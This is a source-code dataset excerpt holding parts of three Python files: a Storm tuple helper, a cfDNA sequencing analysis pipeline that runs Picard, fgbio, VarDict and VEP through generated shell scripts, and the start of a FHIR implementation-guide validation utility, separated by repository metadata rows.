:return: ``True`` if the tuple is a tick tuple, ``False`` otherwise
:rtype: ``bool``
"""
# Tick tuples (generated by Storm; introduced 0.8) are defined as being
# from the __system component and __tick stream.
return tup.comp == '__system' and tup.stream == '__tick'
def is_heartbeat(tup):
"""Tell whether the tuple is a heartbeat tuple or not.
:param tup: tuple to investigate
:type tup: :class:`~.StormTuple`
:return: ``True`` if the tuple is a heartbeat tuple, ``False`` otherwise
:rtype: ``bool``
"""
return tup.task == -1 and tup.stream == '__heartbeat'
class StormWentAwayError(Exception):
"""Raised when the connection between the component and Storm terminates.
"""
def __init__(self):
message = "Got EOF while reading from Storm"
super(StormWentAwayError, self).__init__(message)
from pyleus.storm.bolt import Bolt, SimpleBolt
from pyleus.storm.spout import Spout
_ = [Bolt, SimpleBolt, Spout] # pyflakes
| 30.381818
| 77
| 0.682226
|
ffb6ccad26fb18ff4e18fe3d82daa72d2fa19bd3
| 30,106
|
py
|
Python
|
source_codes/cfDNApipeline.py
|
dkleftogi/cfDNA_AnalysisPipeline
|
0ccb1c01e2c5629cbf89049ff2335b50b3b66881
|
[
"MIT"
] | 6
|
2019-08-28T23:10:46.000Z
|
2021-10-07T20:14:05.000Z
|
source_codes/cfDNApipeline.py
|
dkleftogi/cfDNA_AnalysisPipeline
|
0ccb1c01e2c5629cbf89049ff2335b50b3b66881
|
[
"MIT"
] | null | null | null |
source_codes/cfDNApipeline.py
|
dkleftogi/cfDNA_AnalysisPipeline
|
0ccb1c01e2c5629cbf89049ff2335b50b3b66881
|
[
"MIT"
] | 1
|
2020-04-28T07:14:45.000Z
|
2020-04-28T07:14:45.000Z
|
#!/usr/local/bin/python
'''
cfDNA analysis pipeline main script
BEGIN COPYRIGHT NOTICE
cfDNApipeline code -- (c) 2019 Dimitrios Kleftogiannis -- GIS -- A*STAR
Copyright 2019 Genome Institute of Singapore (GIS) and Agency for Science, Technology and Research (A*STAR).
This Program is free software licensed under the MIT License.
You may only use the source code in this repository in compliance with the license provided in this repository. For more details, please refer to the file named "LICENSE.md".
This Program is distributed as a service to the research community and is experimental in nature and may have hazardous properties.
The Program is distributed WITHOUT ANY WARRANTY, express or implied. In particular all warranties as to SATISFACTORY QUALITY or FITNESS FOR A PARTICULAR PURPOSE are excluded.
Published reports of research using this code (or a modified version) should cite the relevant article of this tool.
Comments and bug reports are welcome.
Email to dimitrios.kleftogiannis@kaust.edu.sa
I would also appreciate hearing about how you used this code, improvements that you have made to it.
You are free to modify, extend or distribute this code, as long as this copyright notice is included whole and unchanged.
END COPYRIGHT NOTICE
UTILITY
This program executes the cfDNA analysis workflow.
INPUT ARGUMENTS
1. The directory you passed to myEnvConfig.sh script where the Conda env is installed
2. An un-deDuped BAM file with UMI tags (absolute path)
3. The directory to store the results (absolute path)
4. A reference genome in fasta format (indexed)
5. A bed file with the panel design (absolute path)
6. The minimum variant allele frequency used for SNV calling (default is 0.005)
7. The string tag incorporated to the BAM file, used to group reads from the same family (e.g., RX or ZU)
8. The directory you downloaded the VEP Cache file (absolute path)
DEPENDENCIES
To resolve the depending programs make sure you run the provided configuration program myEnvConfig.sh and you activated the conda env
RUNNING
Please visit https://github.com/dkleftogi/cfDNA_AnalysisPipeline/blob/master/Execution_examples.md
We provide a step-by-step execution example. To obtain toy data used in this example please contact Dimitrios.
'''
import sys
import os
import re
from itertools import groupby
from collections import defaultdict, Counter
import datetime
from datetime import date
import time
import threading
#prints information about program's execution
def printUsage():
print('To run cfDNA analysis please follow the example below:\n')
print('python cfDNApipeline.py workingDir=XX fileName=XX resultsDir=XX referenceGenome=XX bedFile=XX minVAF=XX tagUMI=XX vepDir=XX\n')
print('Where:\n')
print('workingDir is the absolute directory where the conda env is installed\n')
print('fileName is the absolute path of the bam file\n')
print('resultsDir is the absolute path to a directory for storage of results \n')
print('referenceGenome is the reference genome in fasta format (absolute path)\n')
print('bedFile is the bed file with panel design (absolute path)\n')
print('minVAF is the minimum variant allele frequency used for variant calling (default 0.005)\n')
print('tagUMI is tag string used to group reads from the same family\n')
print('vepDir is the absolute directory where VEP Cache is downloaded and indexed\n')
print('\n\nExample:\n')
print('python cfDNApipeline.py workingDir=/your/working/dir fileName=/path/to/your/example.bam resultsDir=/your/results/dir referenceGenome=/path/to/your/reference/genome.fa bedFile=/path/to/your/panel.bed minVAF=0.005 tagUMI=ZU vepDir=/path/to/your/VEP/cache')
print('\n\nPlease give the arguments in the indicated order similar to the example provided!\n')
print('\n\nAnd remember to activate the conda env\n')
#find the bam file prefix and the actual path and save the results
def storeFile(myFile):
#simple dict to store the values
aDict={}
#check if file exists
if os.path.exists(myFile):
line = myFile.rstrip('\n')
tmp=line.split("/")
sampleName=tmp[-1]
sampleName=sampleName[0:-4]
#print(filename)
restFile='/'.join(tmp[0:-1])
#print('%s with %s\n'%(sampleName,restFile))
aDict[sampleName]=restFile
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('[%s] ERROR from function storeFile: The file does not exist!\n'%(st))
print('************************************************************************************************************************************\n')
sys.exit()
return aDict
#this function takes the bam file with UMIs and removes the duplicates
def processSample(fileHash,workingDir,resultsDir,referenceGenome,scriptsFolder,tagUMI):
#workingDir is the absolute path to your conda installation given from user's argument
GATK_merge='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/picard-2.20.3-0/picard.jar MergeSamFiles'
GATK_deDup='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/picard-2.20.3-0/picard.jar MarkDuplicates'
GATK_sort='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/picard-2.20.3-0/picard.jar SortSam'
FGBIO_mateInfo='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/fgbio/fgbio.jar --tmp-dir=/tmp SetMateInformation'
FGBIO_groupUMI='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/fgbio/fgbio.jar --tmp-dir=/tmp GroupReadsByUmi'
FGBIO_generateConsensus='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/fgbio/fgbio.jar --tmp-dir=/tmp CallMolecularConsensusReads'
FGBIO_filterConsensus='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/fgbio/fgbio.jar -tmp-dir=/tmp FilterConsensusReads'
GATK_samToFastq='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/picard-2.20.3-0/picard.jar SamToFastq'
GATK_mergeAlignment='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/picard-2.20.3-0/picard.jar MergeBamAlignment'
BWA_MEM='bwa mem -t 8 -v 2 -R '
for myArg in fileHash:
outScriptFile=scriptsFolder+'/'+myArg+'_PrePro_commands.txt'
outScript=open(outScriptFile,'w')
projectName='cfDNApipelinePart1'
mergedDIR=fileHash[myArg]
#command 1
mainCommand=GATK_sort+' I='+mergedDIR+'/'+myArg+'.bam O='+resultsDir+'/'+myArg+'.mergedQNAMEsorted.bam SO=queryname VERBOSITY=INFO TMP_DIR=/tmp'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 2
mainCommand=FGBIO_mateInfo+' -i='+resultsDir+'/'+myArg+'.mergedQNAMEsorted.bam -o='+resultsDir+'/'+myArg+'.mergedQNAMEsortedFixed.bam'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 3
#the command take parameters --edits=1 --min-map-q=20 --strategy=adjacency by default, the users can change this in the command below
mainCommand=FGBIO_groupUMI+' --input='+resultsDir+'/'+myArg+'.mergedQNAMEsortedFixed.bam --output='+resultsDir+'/'+myArg+'.grouped.bam --edits=1 --min-map-q=20 --raw-tag='+tagUMI+' --strategy=adjacency --family-size-histogram='+resultsDir+'/'+myArg+'.groupedHist.txt'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 4
mainCommand=GATK_sort+' I='+resultsDir+'/'+myArg+'.grouped.bam O='+resultsDir+'/'+myArg+'.groupedSorted.bam SO=coordinate TMP_DIR=/tmp'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 5
mainCommand='samtools index '+resultsDir+'/'+myArg+'.groupedSorted.bam'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 6
#the following parameters --error-rate-post-umi=30 --min-reads=2 --tag=MI are by default, the users can change this in the command below
mainCommand=FGBIO_generateConsensus+' --input='+resultsDir+'/'+myArg+'.grouped.bam --output='+resultsDir+'/'+myArg+'.consensusUnMapped.bam --error-rate-post-umi=30 --min-reads=2 --tag=MI'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 7
mainCommand=GATK_samToFastq+' I='+resultsDir+'/'+myArg+'.consensusUnMapped.bam F='+resultsDir+'/'+myArg+'.R1.fastq F2='+resultsDir+'/'+myArg+'.R2.fastq VALIDATION_STRINGENCY=SILENT TMP_DIR=/tmp'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 8
rgTAG='\'@RG\\tID:FgBio.'+myArg+''+'\\tPL:ILLUMINA\\tLB:ALL\\tPU:NA\\tSM:'+projectName+'\\tCN:NA\''
mainCommand=BWA_MEM+rgTAG+' -M '+referenceGenome+' '+resultsDir+'/'+myArg+'.R1.fastq '+resultsDir+'/'+myArg+'.R2.fastq | samtools view -hb - > '+resultsDir+'/'+myArg+'.UnSorted.FgbioDeDup.bam'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 9
mainCommand=GATK_sort+' I='+resultsDir+'/'+myArg+'.UnSorted.FgbioDeDup.bam O='+resultsDir+'/'+myArg+'.FgbioDeDup.bam SO=coordinate TMP_DIR=/tmp'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 10
mainCommand='samtools index '+resultsDir+'/'+myArg+'.FgbioDeDup.bam'
outScript.write(mainCommand)
outScript.write("\n\n")
outScript.close()
#submit it
command='sh '+outScriptFile
os.system(command)
#this function runs variant screening and annotation
def variantScreening(fileHash,workingDir,resultsDir,referenceGenome,bedFile,scriptsFolder,minVAF_float,vepDir):
for myArg in fileHash:
outScriptFile=scriptsFolder+'/'+myArg+'_VarScreening_commands.txt'
outScript=open(outScriptFile,'w')
mainCommand='vardict -G '+referenceGenome+' -f '+str(minVAF_float)+ ' -N '+myArg+' -b '+resultsDir+'/'+myArg+'.FgbioDeDup.bam -z -c 1 -S 2 -E 3 -g 4 -h '+bedFile+' | '+workingDir+'/miniconda2/share/vardict-2019.06.04-0/teststrandbias.R | '+workingDir+'/miniconda2/share/vardict-2019.06.04-0/var2vcf_valid.pl -N '+myArg+' -E -f '+str(minVAF_float)+' > '+resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.vcf '
outScript.write(mainCommand)
outScript.write("\n\n")
#we annotate variants
#check https://m.ensembl.org/info/docs/tools/vep/script/vep_cache.html for more info about caches if needed
mainCommand='vep -i '+resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.vcf -o '+resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.vcf --species homo_sapiens --cache --dir '+vepDir +' --canonical --check_existing --force_overwrite --vcf --buffer_size 50'
outScript.write(mainCommand)
outScript.write("\n")
#the second script is ready and we just need to submit
outScript.close()
#submit it
command='sh '+outScriptFile
os.system(command)
#this function parses the annotated VCF and selects only the MODERATE/HIGH calls that fullfill specific criteria
def filterVCF(fileHash,resultsDir):
for myArg in fileHash:
myfile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.vcf'
if os.path.exists(myfile):
InVcfFile=open(myfile,'r')
outFileName=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered.txt'
outFile=open(outFileName,'w')
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
outFile.write('#Original input VCF file: %s.FgbioDeDup.VarDict.VEP.vcf -- Report produced: %s\n'%(myArg,st))
outFile.write('#CHROM\tPOS\tREF\tALT\tGENE\tvariantType\tCOV\tSupporintReads\tVAF\tRefBias\tVarBias\tMeanReadPos\tMeanReadQual\tMeanMappingQual\tSignalToNoise\tHighQualVarReads\tHighQualCov\tConsequence\tImpact\tBiotype\tProteinPos\tAminoAcidChange\tExistingVar\tPopulationVAF\tPredictedClinicalSignif\n')
for eachLine in InVcfFile:
#skip the header
if eachLine[0]!='#':
line=eachLine.rstrip('\n')
tmp=line.split('\t')
#parse the fields we need
CHROM = tmp[0]
POS = tmp[1]
ID = tmp[2]
REF = tmp[3]
ALT = tmp[4]
QUAL = tmp[5]
FILTER = tmp[6]
if FILTER=='PASS':
#get more specific fields about the variant of interest
FORMAT=tmp[7]
tmp=FORMAT.split(';')
#the last at the end is the VEP annotation that we need to parse separately using comma delimiter
annotationFields = tmp[-1]
sample = tmp[0].split('SAMPLE=')
sample = sample[1]
variantType = tmp[1].split('TYPE=')
variantType = variantType[1]
dp = tmp[2].split('DP=')
dp = int(dp[1])
vd = tmp[3].split('VD=')
vd = int(vd[1])
vaf = tmp[4].split('AF=')
vaf = float(vaf[1])
#we do not use this info
bias = tmp[5].split('BIAS=')
bias = bias[1]
refbias = tmp[6].split('REFBIAS=')
refbias = refbias[1]
varbias = tmp[7].split('VARBIAS=')
varbias = varbias[1]
#mean position in reads
pmean = tmp[8].split('PMEAN=')
pmean = float(pmean[1])
#mean quality in reads
qual = tmp[10].split('QUAL=')
qual = float(qual[1])
#this is the Fisher's test p-value from VarDict
sbf = tmp[12].split('SBF=')
sbf = float(sbf[1])
#mean mapping quality
mq = tmp[14].split('MQ=')
mq = float(mq[1])
#the higher the number the better the call
sn = tmp[15].split('SN=')
sn = float(sn[1])
#consider high coverage variant reads
hicnt = tmp[22].split('HICNT=')
hicnt = int(hicnt[1])
#consider high coverage reads
hicov = tmp[23].split('HICOV=')
hicov = int(hicov[1])
tmp = annotationFields.split(',')
for idx in tmp:
#find the canonical transcript
if 'YES' in idx:
canonicalTrans = idx
vepTmp = canonicalTrans.split('|')
Consequence = vepTmp[1]
IMPACT = vepTmp[2]
GENE = vepTmp[3]
BIOTYPE = vepTmp[7]
Protein_position = vepTmp[14]
Amino_acids = vepTmp[15]
Existing_variation = vepTmp[17]
AF = vepTmp[24]
CLIN_SIG = vepTmp[25]
#here we continue otherwise we skip because we are not interested in synonymous variants...
if IMPACT=='MODERATE' or IMPACT=='HIGH':
#write the output except for Complex type of mutations returned by VarDict
if 'Complex' not in variantType:
#apply some filtering
a=varbias.split(':')
FW=int(a[0])
BW=int(a[1])
#here we consider only high quality reads, just to refine our results
if hicov>=100 and hicnt>=3 and FW>1 and BW>1 and pmean>15 and sn>20:
outFile.write('%s\t%s\t%s\t%s\t%s\t%s\t%d\t%d\t%.3f\t%s\t%s\t%.3f\t%.3f\t%.3f\t%.3f\t%d\t%d\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n'%(CHROM,POS,REF,ALT,GENE,variantType,dp,vd,vaf,refbias,varbias,pmean,qual,mq,sn,hicnt,hicov,Consequence,IMPACT,BIOTYPE,Protein_position,Amino_acids,Existing_variation,AF,CLIN_SIG))
InVcfFile.close()
outFile.close()
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] ERROR from function filterVCF: The input %s file does not exist!\n'%(st,myfile))
print('************************************************************************************************************************************\n')
sys.exit()
#this function parses the filtered VCF and generates the input required for duplexCaller to run
def convertFilteredVCF(fileHash,resultsDir):
for myArg in fileHash:
myfile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered.txt'
if os.path.exists(myfile):
outputFile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered_modified.txt'
tmpFile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered_tmp.txt'
InFile=open(myfile,'r')
outFile=open(tmpFile,'w')
for eachLine in InFile:
if eachLine[0]=='#':
a=1
else:
line = eachLine.rstrip('\n')
tmp=line.split("\t")
chrom=tmp[0]
pos=tmp[1]
refAllele=tmp[2]
altAllele=tmp[3]
myType=tmp[5]
if myType=='SNV' or myType=='SNP':
outFile.write('%s\t%s\n'%(chrom,pos))
elif myType=='DEL' or myType=='Deletion':
c=len(refAllele)
for myCount in range(int(pos),int(pos)+c):
outFile.write('%s\t%s\n'%(chrom,myCount))
elif myType=='INS' or myType=='Insertion':
c=len(altAllele)
for myCount in range(int(pos),int(pos)+c):
outFile.write('%s\t%s\n'%(chrom,myCount))
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] WARNING from function produceOutput: No supported mutation type in %s!\n'%(st,inputFile))
print('************************************************************************************************************************************\n')
#sys.exit()
InFile.close()
outFile.close()
command='sort '+tmpFile+' | uniq >'+outputFile
os.system(command)
#remove the tmp file
command='rm '+tmpFile
os.system(command)
else:
#the file does not exist
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] ERROR from function convertFilteredVCF: The input file %s does not exist!\n'%(st,inputFile))
print('************************************************************************************************************************************\n')
sys.exit()
def runDuplexCaller(fileHash,resultsDir,referenceGenome,scriptsFolder):
for myArg in fileHash:
positionFile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered_modified.txt'
if os.path.exists(positionFile):
outScriptFile=scriptsFolder+'/'+myArg+'_duplexCallerCommand.txt'
outScript=open(outScriptFile,'w')
myBAM=resultsDir+'/'+myArg+'.FgbioDeDup.bam'
Num=1
outScript.write('python duplexCallerModified_AWS.py bamFile=%s positionFile=%s referenceGenome=%s outDIR=%s index=%d\n'%(myBAM,positionFile,referenceGenome,resultsDir,Num))
outScript.close()
#we submit the duplexCaller script
command='sh '+outScriptFile
os.system(command)
#the file does not exist
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] ERROR from function runDuplexCaller: The input position file %s does not exist!\n'%(st,positionFile))
print('************************************************************************************************************************************\n')
sys.exit()
def cleanVariantReport(fileHash,resultsDir,referenceGenome,scriptsFolder):
for myArg in fileHash:
originalFile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered.txt'
if os.path.exists(originalFile):
variantReport=resultsDir+'/'+myArg+'.FgbioDeDup_VariantReport.txt'
if os.path.exists(variantReport):
outScriptFile=scriptsFolder+'/'+myArg+'_CleanVariantReportCommand.txt'
outScript=open(outScriptFile,'w')
outScript.write('python filterVariantReportAdjusted.py inputFile=%s originalVCF=%s\n'%(variantReport,originalFile))
outScript.close()
#submit it
command='sh '+outScriptFile
os.system(command)
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] ERROR from function cleanVariantReport: The variant report file %s does not exist!\n'%(st,variantReport))
print('************************************************************************************************************************************\n')
sys.exit()
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('[%s] ERROR from function cleanVariantReport: The original file %s does not exist!\n'%(st,originalFile))
print('************************************************************************************************************************************\n')
sys.exit()
#this function generates the distribution of fragment length
def fragmentLenAnalysis(fileHash,resultsDir,bedFile,scriptsFolder):
for myArg in fileHash:
inputFile=resultsDir+'/'+myArg+'.FgbioDeDup.bam'
if os.path.exists(inputFile):
outScriptFile=scriptsFolder+'/'+myArg+'_fragLenCommand.txt'
outScript=open(outScriptFile,'w')
outScript.write('python insertSizeAnalysisBED.py bamFile=%s bedFile=%s outDIR=%s\n'%(inputFile,bedFile,resultsDir))
outScript.close()
#submit it
command='sh '+outScriptFile
os.system(command)
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('[%s] ERROR from function fragmentLenAnalysis: The input bam file %s does not exist!\n'%(st,inputFile))
print('************************************************************************************************************************************\n')
sys.exit()
#main function of the program
def myMain():
#check the number of input arguments
if len(sys.argv)!=9:
print('************************************************************************************************************************************\n')
print('\t\t\t\t\t\tYour input arguments are not correct!\n')
print('\t\t\t\t\t Genome Institute of Singapore (GIS) -- A*STAR\n')
print('\t\t\tCopyright 2019 GIS - Dimitrios Kleftogiannis & Jun Xian Liew - dimitrios.kleftogiannis@kaust.edu.sa\n')
#if arguments are not correct print a help message
printUsage()
else:
print('************************************************************************************************************************************\n')
print('\t\t\t cfDNApipeline.py: Run the full pipeline for cfDNA data processing and analysis\n')
print('\t\t\t\t Genome Institute of Singapore (GIS) -- A*STAR\n')
print('\t\tCopyright 2019 GIS - Dimitrios Kleftogiannis & Jun Xian Liew - dimitrios.kleftogiannis@kaust.edu.sa\n')
#parse the input arguments
workingDir =sys.argv[1].split('workingDir=')
workingDir =workingDir [1]
fileName =sys.argv[2].split('fileName=')
fileName =fileName [1]
resultsDir =sys.argv[3].split('resultsDir=')
resultsDir =resultsDir[1]
referenceGenome =sys.argv[4].split('referenceGenome=')
referenceGenome =referenceGenome[1]
bedFile =sys.argv[5].split('bedFile=')
bedFile =bedFile[1]
minVAF =sys.argv[6].split('minVAF=')
minVAF =minVAF[1]
minVAF_float=float(minVAF)
if minVAF_float<0 or minVAF_float>1.00:
print('\nWARNING: User gave invalid minVAF argument. Execution continues with default minVAF=0.005\n')
minVAF_float=0.005
tagUMI =sys.argv[7].split('tagUMI=')
tagUMI =tagUMI [1]
vepDir =sys.argv[8].split('vepDir=')
vepDir =vepDir [1]
#print the arguments given by user
print('Execution started with the following parameters:\n')
print('1. workingDir : \t\t\t\t%s' % workingDir)
print('2. fileName : \t\t\t\t%s' % fileName)
print('3. resultsDir : \t\t\t\t%s' % resultsDir)
print('4. referenceGenome : \t\t\t\t%s' % referenceGenome)
print('5. bedFile : \t\t\t\t%s' % bedFile)
print('6. minVAF : \t\t\t\t%.4f' % minVAF_float)
print('7. tagUMI : \t\t\t\t%s' % tagUMI)
print('8. vepDir : \t\t\t\t%s' % vepDir)
#generate a folder to store the scripts
scriptsFolder=workingDir+'/cfDNApipeline_scripts'
command='mkdir -p '+scriptsFolder #+' && mkdir -p '+LSF_logs+' && mkdir -p '+LSF_err
os.system(command)
#generate the folder for the results
command='mkdir -p '+resultsDir
os.system(command)
#save the file
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function storeFile: store file name and path'%(st))
fileHash=storeFile(fileName)
#process the file and generate consensus using UMIs
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function processSample: produce BAM file with consensus sequences'%(st))
processSample(fileHash,workingDir,resultsDir,referenceGenome,scriptsFolder,tagUMI)
#based on the consensus, run variant screening
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function variantScreening: perform variant screening and annotate variants'%(st))
variantScreening(fileHash,workingDir,resultsDir,referenceGenome,bedFile,scriptsFolder,minVAF_float,vepDir)
#filter the annotated VCF file
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function filterVCF: parse annotated VCF file and filter'%(st))
filterVCF(fileHash,resultsDir)
#prepare the data for duplexCaller
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function convertInputVCF: parse filtered VCF file and convert position files'%(st))
convertFilteredVCF(fileHash,resultsDir)
#run it
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function runDuplexCaller: identify duplexes using duplexCaller'%(st))
runDuplexCaller(fileHash,resultsDir,referenceGenome,scriptsFolder)
#produce the filtered report
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] Function cleanVariantReport: produce final variant report'%(st))
cleanVariantReport(fileHash,resultsDir,referenceGenome,scriptsFolder)
#finally we run the fragment lenght analysis from script insertSizeAnalysisBED.py
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] Function fragmentLenAnalysis: perform analysis of fragment lenght'%(st))
fragmentLenAnalysis(fileHash,resultsDir,bedFile,scriptsFolder)
print('************************************************************************************************************************************\n')
#start ...
if __name__=='__main__':
myMain()
| 47.560821
| 408
| 0.565635
|
2d8e60603370fa93f0c6e0fc27aa27f8a4a075af
| 16,892
|
py
|
Python
|
ncpi_fhir_utility/app.py
|
jecos/ncpi-fhir-utility
|
7d2380b737d931f61b53431f5083f093b6aaaad4
|
[
"Apache-2.0"
] | null | null | null |
ncpi_fhir_utility/app.py
|
jecos/ncpi-fhir-utility
|
7d2380b737d931f61b53431f5083f093b6aaaad4
|
[
"Apache-2.0"
] | null | null | null |
ncpi_fhir_utility/app.py
|
jecos/ncpi-fhir-utility
|
7d2380b737d931f61b53431f5083f093b6aaaad4
|
[
"Apache-2.0"
] | null | null | null |
"""
General module for methods called by the ncpi_fhir_utility.cli
- Validation of FHIR data model using IG publisher
- Remove resource configuration from IG
- Publish FHIR data model (conformance and example resources)
to Simplifier.net
"""
from collections import defaultdict
from copy import deepcopy
from pprint import pformat
import os
import logging
import subprocess
from shutil import rmtree
from configparser import ConfigParser
from requests.auth import HTTPBasicAuth
from ncpi_fhir_utility.oauth import OAuth
from ncpi_fhir_utility.utils import read_json, write_json, camel_to_snake
from ncpi_fhir_utility import loader
from ncpi_fhir_utility.client import FhirApiClient
from ncpi_fhir_utility.config import (
RUN_IG_PUBLISHER_SCRIPT,
CONFORMANCE_RESOURCES,
RESOURCE_SUBMISSION_ORDER,
)
RESOURCE_ID_DELIM = "-"
FILENAME_DELIM = RESOURCE_ID_DELIM
logger = logging.getLogger(__name__)
def validate(
ig_control_filepath,
clear_output=False,
publisher_opts="",
refresh_publisher=True,
):
"""
Validate the FHIR data model (FHIR conformance and example resources)
Run the HL7 FHIR implementation guide (IG) publisher in a Docker container
to validate conformance resources and any example resources against the
conformance resources.
See https://confluence.hl7.org/display/FHIR/IG+Publisher+Documentation
Validation fails if any of the following are true:
- The publisher returns a non-zero exit code
- QA report contains errors with the FHIR resources.
- Any one of the resource files fail model validation in
_custom_validate
IG build errors are ignored since this method only validates the data
model
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param clear_output: Whether to clear all generated output before
validating
:type clear_output: boolean
:param publisher_opts: IG publisher command line options forwarded directly
to the publisher CLI
:type publisher_opts: str
:param refresh_publisher: A flag specifying whether to pull down the IG
publisher Docker image from the remote Docker repository before running
the IG publisher
:type refresh_publisher: boolean
"""
logger.info("Begin validation of FHIR data model")
ig_control_filepath = os.path.abspath(
os.path.expanduser(ig_control_filepath)
)
# Clear previously generated output
if clear_output:
clear_ig_output(ig_control_filepath)
# Read in ig resource file
ig_resource_dict = _load_ig_resource_dict(ig_control_filepath)
# Collect resource filepaths
resource_dicts = []
site_root = os.path.dirname(ig_control_filepath)
ig = ig_resource_dict["content"]
for param in ig.get("definition", {}).get("parameter", []):
if param.get("code") != "path-resource":
continue
resource_dicts.extend(
loader.load_resources(os.path.join(site_root, param.get("value")))
)
# Validate and add resource to IG configuration
_custom_validate(resource_dicts)
# Add entry to IG configuration
_update_ig_config(resource_dicts, ig_resource_dict, add=True)
# Do the standard HL7 FHIR validation via the IG Publisher
_fhir_validate(ig_control_filepath, publisher_opts, refresh_publisher)
logger.info("End validation of FHIR data model")
def clear_ig_output(ig_control_filepath):
"""
Delete all of the output dirs generated by the IG publisher
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
"""
site_root = os.path.dirname(ig_control_filepath)
for dir in ["output", "temp", "template", "input-cache"]:
p = os.path.join(site_root, dir)
if os.path.exists(p):
logger.info(f"Clearing all previously generated output at: {p}")
rmtree(p)
def update_ig_config(data_path, ig_control_filepath, add=True, rm_file=False):
"""
Add/remove the configuration entries to/from IG resource file for all
resources in data_path.
Optional - delete the resource file(s). Only applies if add=False.
When a new resource file is added to the IG it will not be picked up for
validation or site generation by the IG publisher unless the expected
configuration for that resource is present.
:param data_path: Path to directory or file containing resource(s) to
remove from the IG configuration
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param add: Whether to add the configuration versus remove it
:type add: bool
:param rm_file: Whether to delete the resource file(s). Only applies if
add=False
:type rm_file: bool
"""
# Load resource dicts
resource_dicts = loader.load_resources(data_path)
# Load IG resource dict
ig_resource_dict = deepcopy(_load_ig_resource_dict(ig_control_filepath))
# Validate and add resource to IG configuration
_custom_validate(resource_dicts)
# Update the IG configuration
_update_ig_config(resource_dicts, ig_resource_dict)
def publish_to_server(
resource_file_or_dir,
base_url,
username=None,
password=None,
oauth_url=None,
oauth_client_id=None,
oauth_client_secret=None,
oauth_uma_audience=None,
fhir_version=None,
submission_order=RESOURCE_SUBMISSION_ORDER,
):
"""
Push FHIR resources to a FHIR server
Delete the resources if they exist on the server
PUT any resources that have an `id` attribute defined
POST any resources that do not have an `id` attribute defined
:param resource_file_or_dir: path to a directory containing FHIR resource
files or path to a single resource file
:type resource_file_or_dir: str
:param username: Server account username
:param oauth_url: OAuth provider url used to get an access token
:type oauth_url: str
:param oauth_client_id: OAuth client id
:type oauth_client_id: str
:param oauth_client_secret: OAuth client secret
:type oauth_client_secret: str
:param oauth_uma_audience: OAuth audience to use to get an UMA ticket. If not present, a singular access token
is used.
:type oauth_uma_audience: str
:type username: str
:param password: Server account password
:type password: str
:param fhir_version: FHIR version number
:type fhir_version: str
